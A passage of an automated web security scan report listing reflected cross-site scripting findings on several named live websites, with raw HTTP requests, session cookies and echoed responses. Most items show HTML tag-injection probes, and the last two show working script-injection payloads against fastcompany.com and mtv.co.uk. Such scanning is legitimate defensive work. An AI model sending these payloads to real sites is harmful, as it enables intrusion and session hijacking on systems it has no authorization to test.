<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quoteb1a5e"><a>6fbabd2ed7f-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...
2.78. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78f82"><a>e24ed7b784c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quote/78f82"><a>e24ed7b784c?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:26 GMT
Vary: Accept-Encoding
Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quote-78f82"><a>e24ed7b784c" class="section-sites sidebar-none">
...[SNIP]...
2.79. http://www.ciphertex.com/sites/all/modules/ubercart/uc_attribute/uc_attribute.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_attribute/uc_attribute.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64cf"><a>25774fd7546 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercarta64cf"><a>25774fd7546/uc_attribute/uc_attribute.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:19 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercarta64cf"><a>25774fd7546-uc_attribute-uc_attribute.css" class="section-sites sidebar-none">
...[SNIP]...
2.80. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a3eb"><a>6d01f6ced87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9a3eb"><a>6d01f6ced87/all/modules/ubercart/uc_order/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:40 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9a3eb"><a>6d01f6ced87-all-modules-ubercart-uc_order-uc_order.css" class="section-9a3eb">
...[SNIP]...
2.81. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c01"><a>0a6bfc45d0a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/34c01"><a>0a6bfc45d0a/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10029
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-34c01"><a>0a6bfc45d0a-uc_order.css" class="section-sites sidebar-none">
...[SNIP]...
2.82. http://www.ciphertex.com/sites/all/modules/ubercart/uc_product/uc_product.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_product/uc_product.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37679"><a>cd992addf4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/uc_product37679"><a>cd992addf4/uc_product.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-uc_product37679"><a>cd992addf4-uc_product.css" class="section-sites sidebar-none">
...[SNIP]...
2.83. http://www.ciphertex.com/sites/all/modules/views_accordion/views-accordion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/views_accordion/views-accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac140"><a>ee39bd0a068 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modulesac140"><a>ee39bd0a068/views_accordion/views-accordion.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:32 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modulesac140"><a>ee39bd0a068-views_accordion-views-accordion.css" class="section-sites sidebar-none">
...[SNIP]...
2.84. http://www.ciphertex.com/sites/default/files/banners/fose.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/fose.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84d"><a>7d48320370f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/files2c84d"><a>7d48320370f/banners/fose.jpg?1308766591 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:10 GMT
Vary: Accept-Encoding
Content-Length: 10030
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-files2c84d"><a>7d48320370f-banners-fose.jpg" class="section-sites sidebar-none">
...[SNIP]...
2.85. http://www.ciphertex.com/sites/default/files/banners/super_savings.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/super_savings.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb692"><a>81b6a9dd69a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/filesbb692"><a>81b6a9dd69a/banners/super_savings.jpg?1312833278 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:26 GMT
Vary: Accept-Encoding
Content-Length: 10048
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-filesbb692"><a>81b6a9dd69a-banners-super_savings.jpg" class="section-sites sidebar-none">
...[SNIP]...
2.86. http://www.ciphertex.com/sites/default/files/hp.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/hp.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d78c8"><a>08c8f38d311 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitesd78c8"><a>08c8f38d311/default/files/hp.swf HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:45 GMT
Vary: Accept-Encoding
Content-Length: 10020
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitesd78c8"><a>08c8f38d311-default-files-hp.swf" class="section-sitesd78c8">
...[SNIP]...
2.87. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/minnelli/minnelli.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32443"><a>bbdb3da3f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland32443"><a>bbdb3da3f46/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:16 GMT
Vary: Accept-Encoding
Content-Length: 10022
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland32443"><a>bbdb3da3f46-minnelli-minnelli.css" class="section-themes sidebar-none">
...[SNIP]...
2.88. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f99"><a>90e517ca856 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/13f99"><a>90e517ca856/style.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:25 GMT
Vary: Accept-Encoding
Content-Length: 9984
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-13f99"><a>90e517ca856-style.css" class="section-themes sidebar-none">
...[SNIP]...
2.89. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9780e"><a>2292d728864 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland/style.css9780e"><a>2292d728864?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:18 GMT
Vary: Accept-Encoding
Content-Length: 9998
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland-style.css9780e"><a>2292d728864" class="section-themes sidebar-none">
...[SNIP]...
2.90. http://www.fastcompany.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9939"><script>alert(1)</script>44507fb50f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a9939"><script>alert(1)</script>44507fb50f4=1 HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:58 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:09:18 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:17 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1315831757-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www010
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Content-Length: 67722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<link rel="canonical" href="/?a9939"><script>alert(1)</script>44507fb50f4=1" />
...[SNIP]...
2.91. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9a84"-alert(1)-"276e5b2f698 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
